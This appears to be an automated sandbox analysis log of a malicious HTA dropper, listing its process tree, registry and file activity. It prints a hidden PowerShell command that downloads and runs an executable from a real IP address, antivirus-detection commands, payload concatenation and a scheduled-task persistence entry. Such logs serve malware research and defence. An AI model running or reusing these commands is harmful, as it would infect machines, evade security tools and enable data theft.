Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
Source: ugdKEDU[1].exe.10.dr, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: ugdKEDU.exe.10.dr, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, Settings.cs Base64 encoded string: 'jt7petUlo0ug2MsCzVMKt9/j45rerOU1d/GPEPWLJFe+H3pXly/OH7T4lNNloy1phyTUA31BApIuYGXh4M3ITQ==', 'RinBFlv6CoON8dfCdbMmHSR/bjTjZxpmp/C4cU5CYeLzvugCRQwGf8Ydjz94RIFUpNRUIf5kZvhGEIWjppphPw==', 'IZ2BXi8bCOlbmV8KifuLoVDJeGZFNcS4g7/wlkNi2wW5l4Bbuw3Jv43UH4HB3/BUMkPOIEooXJvKUUpfsGaTWA==', 'RdwXLN5a7S8dkyxAlfuu6YTqJf+zcXKa+cqhZXuhPQdU8CJwtp07f6pSL9hoQu6biTK4wseW8j/GH63EjM4mgw==', 'n0RjFjfSVBpwHaz96xS0hCR+Otd97fIfsz3iZKGF6msJi6i4L2wMc5UtmNsv3ksQ+K/43kRd/d5CMA9ekByrDw==', 'TigQT4rQmQmr+hPu7IV1K2CRo7uZqWO3gkX0gqfC5ipI0caXowzM5lhz1rVBhEtnFViY1ThUA8HftEbkeP9zfg=='
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winHTA@118/128@0/11
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009941FA GetLastError,FormatMessageW, 28_2_009941FA
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00982010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 28_2_00982010
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981A0B AdjustTokenPrivileges,CloseHandle, 28_2_00981A0B
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 11_2_004044D1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 28_2_0098DD87
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004024FB CoCreateInstance, 11_2_004024FB
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00993A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 28_2_00993A0E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1548
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twtwbay0.tzv.ps1
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: ugdKEDU.exe, 00000022.00000002.3565393312.000000000390C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SeP4o9Jp8A.hta Virustotal: Detection: 23%
Source: SeP4o9Jp8A.hta ReversingLabs: Detection: 18%
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\SeP4o9Jp8A.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE"
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe"
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp "C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp" /SL5="$60444,14491362,830464,C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe "C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe"
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp" /SL5="$70440,3422545,56832,C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE "C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE"
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe "C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe "C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe "C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe "C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Process created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp "C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp" /SL5="$60444,14491362,830464,C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe"
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Process created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe "C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe "C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 952
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Process created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp "C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp" /SL5="$70440,3422545,56832,C:\Users\user\AppData\Local\Temp\1053476001\stail.exe"
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
